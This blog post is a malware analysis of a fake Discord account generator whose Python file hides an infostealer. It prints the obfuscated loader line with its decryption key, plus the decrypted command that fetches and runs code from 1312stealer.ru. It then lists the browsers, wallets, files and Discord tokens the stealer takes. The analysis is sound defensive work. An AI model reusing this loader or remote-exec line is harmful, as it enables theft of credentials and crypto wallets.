DEV Community

Spring-0
Spring-0

Posted on • Edited on

Exposing the Deception: Discord Account Generator with Hidden Malware

The Discord community has become a haven for malicious actors, whether it is through utilizing Discord's CDN server to spread malicious files with a trusted link, using Discord servers as C2 servers, and more.

More specifically, in this post I will be investigating one of many malicious "discord token generators" on the market, lets get started.

The software is advertised on GitHub as a open source project here.

If you head to the project description, you will see something quite weird. Open source a non-functional version of the project and advertise a paid version in that very same repository?

Repository

The shop is powered by sell.app so the website itself does not seem malicious.

Now lets investigate the paid version download.

The download consists of a "genSetup.zip" file containing the following:
FileContent

  • config.toml: Empty configuration file, maybe it gets generated? (Hint: no it doesn't)
  • key.txt: Seems like where the user is meant to enter their key. I am presuming one is given after making the purchase.
  • requirements.txt: Consists of valid libraries that are required for this type of project.
  • start.bat: Simply runs the python file, nothing special there.

Opening main.py we see the following (notice the imports)
CodeScreenshot

After reviewing the rest of the code it is identical to the version the actor uploaded to GitHub. There does not seem to be any malicious code, well at least not malicious to the user. Discord says otherwise.

So where is this malicious code? We were given a non obfuscated python file.

You may have already noticed in the initial code screenshot, but the horizontal scrollbar informs us that there is much more content to see. And turns out the malicious code was on the very first line just padded with a bunch of white spacing.

Here is the revised code of the first few lines with the white spacing removed.

import requests   ;import os;os.system('pip install cryptography');os.system('pip install fernet');os.system('pip install requests');from fernet import Fernet;import requests;exec(Fernet(b'NxcOFeqTLbTifLJ5_7mxQXhutuWykVQw0M_plAqkbAk=').decrypt(b'gAAAAABmZSyv6BjNz3eMFn6xU8umUhs2m33n49caMlU4XWRcQBntQQ2jwtDuUA9pKNfT9wnyBx6TJoPUvA2vDVJkWV5KcAsR1Qtjmgsr-t1oenrd8TxXsDO6QGg2LcQlMonT1qgE8LZ4KDDIKlDupRJLqakR1ZkvtJctUKSMBFIP0Y2EmXjCFCgIzC-n4kJDmsiqJUiUMIcrEgP30SU4GU2lfwOhDyO95cv7MXdbZAyLbqfd0nwK2sU=')) # type: ignore
Enter fullscreen mode Exit fullscreen mode

A sneaky one liner. Now we can begin examining the payload.

Firstly it installs the following libraries:
These libraries were not listed in the provided "requirements.txt" file.

  1. cryptography
  2. fernet
  3. requests

The # type: ignore is used to hide type errors.

We can clearly see that some encrypted code is being executed through the exec() function call.

Lucky for us, the fernet encryption key is right there in the code!

If the encryption key is provided in the source code, what is the point of encrypting the payload?
This is an evasive technique used to evade any signature based malware scanners.

Using the following code I wrote, I was able to see the decrypted code.

key = "NxcOFeqTLbTifLJ5_7mxQXhutuWykVQw0M_plAqkbAk="
message = "gAAAAABmZSyv6BjNz3eMFn6xU8umUhs2m33n49caMlU4XWRcQBntQQ2jwtDuUA9pKNfT9wnyBx6TJoPUvA2vDVJkWV5KcAsR1Qtjmgsr-t1oenrd8TxXsDO6QGg2LcQlMonT1qgE8LZ4KDDIKlDupRJLqakR1ZkvtJctUKSMBFIP0Y2EmXjCFCgIzC-n4kJDmsiqJUiUMIcrEgP30SU4GU2lfwOhDyO95cv7MXdbZAyLbqfd0nwK2sU="

fernet = Fernet(key)
decrypted_message = fernet.decrypt(message)
print(decrypted_message.decode())
Enter fullscreen mode Exit fullscreen mode

And this is the output:

exec(requests.get('https://1312stealer.ru/paste?userid=1000000000').text.replace('<pre>','').replace('</pre>',''))
Enter fullscreen mode Exit fullscreen mode

Yet another exec() function call, with the content from a website with the domain 1312stealer. Not very subtle now.

Anyways, lets see this what is being executed.
PasteFromSite

Installing fernet again? And this time with a different system execution command? Looks to me that someone has been using ctrl+c & ctrl+v too much πŸ˜‚

Lets break this down.
The code is creating a file named "gruppe.py" in the APPDATA directory and writing code into it and finally executes it.

Judging by the length of the encrypted payload (trimmed in the screenshot above) it looks like the final payload.

Lets decrypt it using the same method used previously and see exactly what this malware is doing.

There is a targeted list of browsers, browser extensions, wallets, directories to search, file keywords, file extensions, and discord token paths.

Here are the specific targets:

Browsers

  • Google Chrome
  • Microsoft Edge
  • Opera
  • Opera GX
  • Brave
  • Yandex
  • Firefox

Browser Extensions

  • Authenticator
  • Binance
  • Bitapp
  • BoltX
  • Coin98
  • Coinbase
  • Core
  • Crocobit
  • Equal
  • Ever
  • ExodusWeb3
  • Fewcha
  • Finnie
  • Guarda
  • Guild
  • HarmonyOutdated
  • Iconex
  • Jaxx
  • Kaikas
  • KardiaChain
  • Keplr
  • Liquality
  • MEWCX
  • MaiarDEFI
  • Martian
  • Math
  • Metamask
  • Metamask2
  • Mobox
  • Nami
  • Nifty
  • Oxygen
  • PaliWallet
  • Petra
  • Phantom
  • Pontem
  • Ronin
  • Safepal
  • Saturn
  • Slope
  • Solfare
  • Sollet
  • Starcoin
  • Swash
  • TempleTezos
  • TerraStation
  • Tokenpocket
  • Ton
  • Tron
  • Trust Wallet
  • Wombat
  • XDEFI
  • XMR.PT
  • XinPay
  • Yoroi
  • iWallet

Wallets

  • Atomic
  • Exodus
  • Electrum
  • Electrum-LTC
  • Zcash
  • Armory
  • Bytecoin
  • Jaxx
  • Etherium
  • Guarda
  • Coinomi

Target Paths

  • Desktop
  • Documents
  • Downloads
  • OneDrive\Documents
  • OneDrive\Desktop

File Keywords

  • passw
  • mdp
  • mot_de_passe
  • login
  • secret
  • account
  • acount
  • paypal
  • banque
  • metamask
  • wallet
  • crypto
  • exodus
  • discord
  • 2fa
  • code
  • memo
  • compte
  • token
  • backup
  • seecret

Now let's further investigate into how they are being targeted.

Firstly, passwords and cookies are being retrieved from the browser and saved to "APPDATA\gruppe_storage". This storage folder is used to store all the details extracted from the victim's machine.

The passwords that are being retrieved are the ones that you choose to save (That popup that asks you to save password whenever you register to a site).

BrowserCode

Browser extension folders are simply being zipped up whole, no specific data is being extracted from them.
ExtensionCode

Using regular expression, discord tokens are being retrieved from the local discord files. Along with tokens, discord connected data including phone numbers, emails, display name, user id are also being retrieved.

In case you are not aware, having access to an individual's discord token allows you to authenticate as them regardless of two factor authentication.

Files located in the Desktop or Documents directories are being filtered based on the target keywords and file extensions listed above.

PathFilteringCode

Similar to browser extensions, wallet paths are also being zipped up whole.

WalletPathCode

Specific to the Atomic and Exodus wallets, malicious code retrieved from https://1312stealer.ru/wallet and https://1312stealer.ru/wallet/atomic are being written to the wallet directories which injects into the wallets capturing mnemonics and passwords.

WalletInjectionCode

Ten times. It calls the inject function 10 times. I guess they really want that in there πŸ˜‚

Well now all that data is sitting in APPDATA\grouppe_storage, how do they get their hands on this data?

SendToServerCall
We can see that each file in grouppe_storage being passed as a parameter to the upload_to_server() function.

Here we can see the final location this data is being sent to: 1312stealer.ru/delivery
SendToServerCode

Again being called 10 times. Maybe 10 is their lucky number 🀷

Thanks for reading :)

🌱

Top comments (2)

Collapse
 
ramell profile image
Keef

Exceptional work, Spring.

Collapse
 
adamsws profile image
Adam

Good insight. Nice job.